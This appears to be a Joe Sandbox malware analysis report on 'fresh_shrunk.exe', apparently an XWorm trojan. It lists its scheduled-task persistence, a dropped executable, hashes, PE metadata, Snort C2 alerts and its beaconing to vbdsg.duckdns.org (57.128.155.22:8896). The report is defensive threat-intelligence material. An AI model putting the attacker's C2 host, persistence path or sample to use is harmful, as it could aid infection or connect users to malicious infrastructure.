                vbdsg.duckdns.orgtrue
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 00000001.00000002.4136838151.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    57.128.155.22
                    		vbdsg.duckdns.orgBelgium
                    		2686ATGS-MMD-ASUStrue

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1429324
                    Start date and time:2024-04-21 23:22:03 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 14s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:22
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:fresh_shrunk.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@28/5@1/1
                    EGA Information:
                    • Successful, ratio: 75%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 52
                    • Number of non-executed functions: 1
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded IPs from analysis (whitelisted): 40.127.169.103, 72.21.81.240, 20.242.39.171, 20.3.187.198
                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                    • Execution Graph export aborted for target RegAsm.exe, PID 6616 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • VT rate limit hit for: fresh_shrunk.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    22:22:56Task SchedulerRun new task: Nano path: "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe"
                    23:23:06API Interceptor9480295x Sleep call for process: RegAsm.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    57.128.155.228QpxBYQvg1.exeGet hashmaliciousPureLog StealerBrowse
                      file.exeGet hashmaliciousGlupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5SystemzBrowse
                        file.exeGet hashmaliciousGlupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5SystemzBrowse
                          file.exeGet hashmaliciousRedLineBrowse
                            CHZlSQKW3X.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, zgRATBrowse
                              IkYqsQV4ty.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5SystemzBrowse
                                51lz9Xlo4S.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5SystemzBrowse
                                  AkJ6Em8xAv.exeGet hashmaliciousGlupteba, LummaC Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, zgRATBrowse
                                    vxBrm6K24y.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, zgRATBrowse
                                      file.exeGet hashmaliciousRedLineBrowse

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        vbdsg.duckdns.orgINVOICE#BUSAPOMKDS03.lnkGet hashmaliciousAsyncRAT, Metasploit, VenomRAT, XWormBrowse
                                        • 154.30.255.175

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ATGS-MMD-ASUSb3astmode.arm7.elfGet hashmaliciousMiraiBrowse
                                        • 57.171.100.63
                                        b3astmode.x86.elfGet hashmaliciousUnknownBrowse
                                        • 48.189.85.168
                                        qHaDdrhGKL.elfGet hashmaliciousMiraiBrowse
                                        • 34.17.28.164
                                        dugw41p62T.elfGet hashmaliciousMiraiBrowse
                                        • 34.39.186.15
                                        FE8sC55u4j.elfGet hashmaliciousMiraiBrowse
                                        • 32.202.32.116
                                        w2wnAQTd6O.elfGet hashmaliciousUnknownBrowse
                                        • 48.13.8.19
                                        Y98pGn3FUt.elfGet hashmaliciousMiraiBrowse
                                        • 195.75.249.254
                                        tajma.arm7-20240421-1029.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 57.238.135.17
                                        http://134.213.29.14:82/grep.x86_64Get hashmaliciousIPRoyal PawnsBrowse
                                        • 34.160.144.191
                                        FFE Order details - Cincy v41720.xlsxGet hashmaliciousUnknownBrowse
                                        • 34.36.216.150

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

                                        Download File
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):323
                                        Entropy (8bit):5.363435887027673
                                        Encrypted:false
                                        SSDEEP:6:Q3La/xwcz92W+P12MUAvvr3tDLIP12MUAvvR+uTL2ql2ABgTv:Q3La/hz92n4M9tDLI4MWuPTAv
                                        MD5:A92E44C0313DAFEC1988D0D379E41A2F
                                        SHA1:C2F5644C418A81C1FB40F74298FF39D1420BFAC0
                                        SHA-256:F3F3E681BE07C36042639B1679ACF8B2D23BE037713D5E395C48006840DBE77A
                                        SHA-512:4F32FE6F35FC6EB4D4CF41EDEDE3C6B3FDFE31E58DA6FC7B301B1EBD3FBEEE64681C928B45E87CD556A1D32D32CB5932764EAB22FFEE11E42B8D5EB0DCFDC22C
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\bddddsx.exe.log

                                        Download File
                                        Process:C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):737
                                        Entropy (8bit):5.352753964755418
                                        Encrypted:false
                                        SSDEEP:12:Q3La/KDLI4MWuPTAWzAbDLI4MNldKZarkvoDLI4MWuCOKbbDLI4MWuPJKAVKhav:ML9E4KjsXE4qdKqE4KnKDE4KhKiKhk
                                        MD5:DA7EF1B9630A3E6C3B70892390887AF9
                                        SHA1:6EF2D6E0ADFC00EF044509BD3AA1A22791B968FA
                                        SHA-256:82B646ADAC247AF19A3994984FA089EEB9DD71405062D3CE971735D51F0E95AD
                                        SHA-512:AF6CD48959D6705FC5B9EC82DBF1BDB9D585141A2CE9A57E45B579D257AC8C8781D1F88F5855EC14ED707EF30D98C8AD9C6382C9DF5F0A69FD12BEC86A3DE128
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.Management.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fresh_shrunk.exe.log

                                        Download File
                                        Process:C:\Users\user\Desktop\fresh_shrunk.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):737
                                        Entropy (8bit):5.352753964755418
                                        Encrypted:false
                                        SSDEEP:12:Q3La/KDLI4MWuPTAWzAbDLI4MNldKZarkvoDLI4MWuCOKbbDLI4MWuPJKAVKhav:ML9E4KjsXE4qdKqE4KnKDE4KhKiKhk
                                        MD5:DA7EF1B9630A3E6C3B70892390887AF9
                                        SHA1:6EF2D6E0ADFC00EF044509BD3AA1A22791B968FA
                                        SHA-256:82B646ADAC247AF19A3994984FA089EEB9DD71405062D3CE971735D51F0E95AD
                                        SHA-512:AF6CD48959D6705FC5B9EC82DBF1BDB9D585141A2CE9A57E45B579D257AC8C8781D1F88F5855EC14ED707EF30D98C8AD9C6382C9DF5F0A69FD12BEC86A3DE128
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.Management.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                        C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe

                                        Download File
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):167936
                                        Entropy (8bit):4.978749761301541
                                        Encrypted:false
                                        SSDEEP:1536:fJZhM+Qw6/iPxFPP3t/zzdnr8EI5jayp3z3hXdmd30RrSkbiKyhz5u36UU5eX9Mk:++SrvbvyZg6UU529cI1VoheH
                                        MD5:745A24A4347A0BB2B9C5E1BA5B2DADEB
                                        SHA1:E89EECDF3BD5A8F34B8933986567CFDA2401E17A
                                        SHA-256:AD5C027ED298920CD09CEFBFCB08BFF9B5B55EE1F411BA59F6D1E77677E3BB5C
                                        SHA-512:6E5226E348C37DED536177495F5D6697AB4034FD12433A069BD9B9EECE5585853E921AAF76BA68A92FF349147BC1272D9156EDE8EC6C1DBBFA6D16A659EBCAFF
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 55%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%..e.................6...P.......U... ...`....@.. ....................................@.................................aU..J....`...L........................................................................... ............... ..H............text....5... ...6.................. ..`.rsrc....L...`...N...8..............@..@.reloc..............................@..B.................U......H.......\X...b......<......}............................................0.......... .O......+Y8^...#S...:]\@+Y.-.~7...~.... ....+H+M~:...~9...+H+I+N.-.~<...~;...+F(....(.....-..-..,.*st...8.....8.....+.(....+.(....+..+.(....+.(....+..+......(u...*b.....+.+.*(K...+.(....+.....0...........8....8.....8....~>...8.......9....&&&&~>...8......8....~7...~.... ....8....8......+d.........~.... )...(......... ......~.... 6...(.......~@.....(.....B....~7...~C....(....(......X.-...~E....

                                        C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:false
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):4.978749761301541
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:fresh_shrunk.exe
                                        File size:167'936 bytes
                                        MD5:745a24a4347a0bb2b9c5e1ba5b2dadeb
                                        SHA1:e89eecdf3bd5a8f34b8933986567cfda2401e17a
                                        SHA256:ad5c027ed298920cd09cefbfcb08bff9b5b55ee1f411ba59f6d1e77677e3bb5c
                                        SHA512:6e5226e348c37ded536177495f5d6697ab4034fd12433a069bd9b9eece5585853e921aaf76ba68a92ff349147bc1272d9156ede8ec6c1dbbfa6d16a659ebcaff
                                        SSDEEP:1536:fJZhM+Qw6/iPxFPP3t/zzdnr8EI5jayp3z3hXdmd30RrSkbiKyhz5u36UU5eX9Mk:++SrvbvyZg6UU529cI1VoheH
                                        TLSH:FCF35BBE37558E33E94909B088994154832DBD469E83DF1774893F28BF717C92A1BACC
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%..e.................6...P.......U... ...`....@.. ....................................@................................

                                        File Icon

                                        Icon Hash:1ff3b0b0b0b0331e

                                        Static PE Info

                                        General

                                        Entrypoint:0x4155ab
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x65F3EA25 [Fri Mar 15 06:26:45 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x155610x4a.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x14cdd.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2c0000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000x135b10x136001c302f8e97dbfa18502b35bf1beae8c9False0.7181577620967742data7.228149219206704IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0x160000x14cdd0x14e003e2b82f432db956a89421325885fba87False0.0578686377245509data1.9011718204172392IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x2c0000xc0x20033e042c05234517b70c8d592d6567816False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0x160840x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/mEnglishUnited States0.03228143854252928
                                        RT_ICON0x268d00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.08360995850622406
                                        RT_ICON0x28e9c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.12312382739212008
                                        RT_ICON0x29f680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.25975177304964536
                                        RT_GROUP_ICON0x2a4200x3edataEnglishUnited States0.8387096774193549
                                        RT_VERSION0x2a49a0x420dataEnglishUnited States0.3693181818181818
                                        RT_MANIFEST0x2a8f60x3e7XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (939), with CRLF line terminatorsEnglishUnited States0.5145145145145145

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        04/21/24-23:26:43.756948TCP2852874ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M288964973057.128.155.22192.168.2.4
                                        04/21/24-23:23:14.441038TCP2855924ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497308896192.168.2.457.128.155.22
                                        04/21/24-23:27:02.685039TCP2852870ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes88964973057.128.155.22192.168.2.4
                                        04/21/24-23:27:02.686118TCP2852923ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)497308896192.168.2.457.128.155.22
                                        04/21/24-23:26:01.631776TCP2853193ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497308896192.168.2.457.128.155.22

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Apr 21, 2024 23:23:03.372555017 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:23:03.569631100 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:23:03.569751024 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:23:03.744055986 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:23:03.982362032 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:23:13.622119904 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:23:13.677329063 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:23:14.441037893 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:23:14.653438091 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:23:14.656141996 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:23:14.893460035 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:23:25.115336895 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:23:25.326075077 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:23:25.328269958 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:23:25.565290928 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:23:35.802908897 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:23:36.001081944 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:23:36.004924059 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:23:36.242527962 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:23:43.624783039 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:23:43.677382946 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:23:46.491039038 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:23:46.693980932 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:23:46.698088884 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:23:46.936300039 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:23:57.177817106 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:23:57.382275105 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:23:57.386032104 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:23:57.623375893 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:03.287004948 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:03.489339113 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:03.491452932 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:03.728630066 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:05.615314007 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:05.819125891 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:05.820583105 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:06.058979988 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:07.818308115 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:08.032133102 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:08.037156105 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:08.275115967 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:13.631813049 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:13.677462101 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:18.505767107 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:18.705950022 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:18.707484961 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:18.953938007 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:23.149889946 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:23.369520903 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:23.374878883 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:23.611116886 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:31.865227938 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:32.065583944 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:32.068551064 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:32.305314064 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:35.865466118 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:36.075592041 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:36.077763081 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:36.319375038 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:43.838212967 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:43.880637884 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:44.177797079 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:44.397531986 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:44.399211884 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:44.637353897 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:47.256289005 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:47.454758883 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:47.457797050 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:47.694945097 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:52.802843094 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:53.000772953 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:53.000927925 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:53.216415882 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:53.216655016 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:53.436222076 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:53.436364889 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:53.677815914 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:24:53.677891016 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:24:53.917680025 CEST88964973057.128.155.22192.168.2.4
